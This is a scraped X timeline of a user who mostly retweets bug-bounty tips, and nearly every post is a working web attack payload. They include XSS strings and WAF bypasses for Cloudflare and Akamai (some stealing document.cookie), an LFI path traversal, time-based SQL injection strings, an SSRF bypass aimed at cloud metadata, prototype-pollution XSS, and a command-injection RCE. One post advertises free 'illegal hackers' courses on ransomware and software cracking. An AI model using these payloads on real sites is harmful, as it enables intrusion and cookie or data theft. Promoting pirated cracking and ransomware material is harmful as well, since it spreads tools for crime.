r4inb0w-li0n

118 posts

r4inb0w-li0n

r4inb0w-li0n

@anhdq201

Katılım Nisan 2020
289 Takip Edilen19 Takipçiler
r4inb0w-li0n retweetledi
N$🌟
N$🌟@nav1n0x·
#XSS in the .css url path?, yes.. here you go... #BugBounty Original url: "target/lib/css/animated.min.css" XSS Found in "/lib/css/animated.min'"/><script%20>alert(document.domain)<%2fscript>.css"
N$🌟 tweet media
English
16
154
708
40.2K
X
X@TheMsterDoctor1·
📚 ILLEGAL7 HACKERS ALL COURSES 📚 Software cracking 🟢Advanced software cracking 🟢Cracker Tools 2.8 🟢Dotnet Software Reverse Engineering And Static Analysis Course 🟢Ransomware virus course 🟢Reverse Engineering Course 🟢Software Cracking Course Size : 6.11 GB 100% Free For First 1000 User's.. Simply: 1. Follow (So I Will Dm) 📥 2. Like and Repost 3. Comment “ Send ” to receive your copies!! 📚 "I do not own this content. For any issues or concerns, please contact the rightful owner directly."
X tweet mediaX tweet media
English
561
580
1.4K
171.6K
r4inb0w-li0n retweetledi
Godfather Orwa 🇯🇴
Godfather Orwa 🇯🇴@GodfatherOrwa·
that was very quick and amazing LFI .... filePath=../../../../../../../../../../../../../../windows/system32/drivers/etc/hosts #Bugbounty
Godfather Orwa 🇯🇴 tweet mediaGodfather Orwa 🇯🇴 tweet media
English
25
188
943
76.2K
r4inb0w-li0n retweetledi
XSS Payloads
XSS Payloads@XssPayloads·
Very nice one by @renniepak <script>a="import\x28"</script> <script>b="`//0-a\x2e"</script> <script>c="nl`\x29"</script><script>d=setTimeout</script><script>e=eval</script><script>f=`${a}${b}${c}`</script><script>d`e\x28f\x29`</script> Demo at: renniepak.nl/matrixss.html
English
1
65
259
23.6K
r4inb0w-li0n retweetledi
BRute Logic
BRute Logic@BRuteLogic·
Brute #XSS 😎 Evolution of #JS PoCs Simple Dialogs: alert(1) (alert)(1) a=alert,a(1) alert?.(1) ⬇️ Remote Calls: import('//X55.is') import(id) ⬇️ Indirect Function Calls: innerHTML=URL,outerHTML=textContent location=textContent Check our blog for more: brutelogic.com.br
English
1
56
206
20.2K
r4inb0w-li0n retweetledi
Godfather Orwa 🇯🇴
Godfather Orwa 🇯🇴@GodfatherOrwa·
7 SQLs 4 in php (select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/ 1 in aspx orwa';%20waitfor%20delay%20'0:0:6'%20--%20 2 in graphql orwa') OR 11=(SELECT 11 FROM PG_SLEEP(6))-- #bugbountytips #bugbountytip 💕
Godfather Orwa 🇯🇴 tweet mediaGodfather Orwa 🇯🇴 tweet mediaGodfather Orwa 🇯🇴 tweet media
English
35
657
2K
147.9K
r4inb0w-li0n retweetledi
X
X@TheMsterDoctor1·
Cloudfare bypass rxss payload : <ScRiPt >confirm(1)</ScRiPt> [❌Blocked] PFNjUmlQdCA+Y29uZmlybSgxKTwvU2NSaVB0Pg== [✅Bypassed] #bugbountytips #BugBounty
English
6
74
230
19K
r4inb0w-li0n retweetledi
X
X@TheMsterDoctor1·
Prototype-Pollution XSS /blog/?__proto__[transport_url]=%3C%2fscript%3E%3Cscript%3Ealert(document.cookie)%3C%2fscript%3Eivl0w --> Endpoint blog Not Vulnerable /my.basket/?__proto__[transport_url]=%3C%2fscript%3E%3Cscript%3Ealert(document.cookie)%3C%2fscript%3Eivl0w --> Endpoint
X tweet media
English
6
112
360
23.5K
r4inb0w-li0n retweetledi
Hussein Daher
Hussein Daher@HusseiN98D·
Successfully bypassed a SSRF WAF by using a combination of IPV6 + Unicode. Payload for Metadata instances: http://[::ⓕⓕⓕⓕ:①⑥⑨。②⑤④。⑯⑨。②⑤④]:80 Check images for response difference between 169.254.169.254 and the above payload I shared 🔥 #bugbounty #infosec #waf
Hussein Daher tweet mediaHussein Daher tweet media
English
55
522
1.9K
184.2K
r4inb0w-li0n retweetledi
X
X@TheMsterDoctor1·
I found a SQL on one URL but properly secured. But found @LiveOverflow new video "HTML Sanitizer Bypass Investigation". I give it a try and I was able to bypass Cloudflare which leads to XSS. payload: '<00 foo="<a%20href="javascript:alert('XSS-Bypass')">XSS-CLick</00>--%20/
X tweet media
English
6
75
305
22.8K
r4inb0w-li0n retweetledi
Un9nPlayer
Un9nPlayer@Un9nPlayer·
XSS to SQL injection parameter reflect Payload: p='<00 foo="<h1>">HTML</00>-- / SQLMAP injection: "p=<00 foo="<h1>">HTML*</00>" #BugBounty #bugbountytips #sqlinjection #xss Proof:
Un9nPlayer tweet mediaUn9nPlayer tweet mediaUn9nPlayer tweet mediaUn9nPlayer tweet media
English
8
66
258
17.8K
r4inb0w-li0n retweetledi
Anton
Anton@therceman·
Bug Bounty Hint Don't forget about the magical '<math>' element, which can make any HTML element clickable within it when using the Firefox browser. <math> <xss href="javascript:alert(1337)"> Click Me </xss> </math> This method can be used to bypass Cheers!
English
3
72
343
28.1K
r4inb0w-li0n retweetledi
pikpikcu
pikpikcu@pikpikcu·
After several tries of Bypass Xss payload and it worked. Payloads: "*alert(1)*"
pikpikcu tweet mediapikpikcu tweet media
English
6
104
439
56.6K
r4inb0w-li0n retweetledi
zhero;
zhero;@zhero___·
Stored XSS via cache poisoning 🧪 the Akamai WAF really annoyed me, but the craft of this payload defeated it : "><a nope="%26quot;x%26quot;"onmouseover="Reflect.get(frames,'ale'+'rt')(Reflect.get(document,'coo'+'kie'))"> #bugbountytips #BugBounty #Hacking
zhero; tweet media
English
20
184
646
62.6K
r4inb0w-li0n retweetledi
🇪🇨🍫
🇪🇨🍫@bxmbn·
Today's XSS in a Multi-Reflection case: xss%27);}}});alert(document.cookie);$(function+a(){a();});$(function+a(){if(a){}else+if(a){/*///
🇪🇨🍫 tweet media
English
20
136
593
49.4K
r4inb0w-li0n retweetledi
MR404NTF
MR404NTF@M404ntf·
Xss using css: <style>img{background-image:url('javascript:alert(1)')}</style> Firewall bypass: <style>*{background-image:url('\6A\61\76\61\73\63\72\69\70\74\3A\61\6C\65\72\74\28\6C\6F\63\61\74\69\6F\6E\29')}</style> #WAF #BugBounty #BugBountyTip #infosec
English
1
9
18
0
r4inb0w-li0n retweetledi
N$🌟
N$🌟@nav1n0x·
This is one of the easiest RCEs I've ever found in my BB, lets hope this isn't a duplicate. Found an endpoint with `something.php?run=`, execute the encoded `%26echo%20`id`%24()%5C%20 ` in HTTP request, surprised to see when server returned ID. #BugBounty #RCE
N$🌟 tweet mediaN$🌟 tweet media
English
26
161
701
51.6K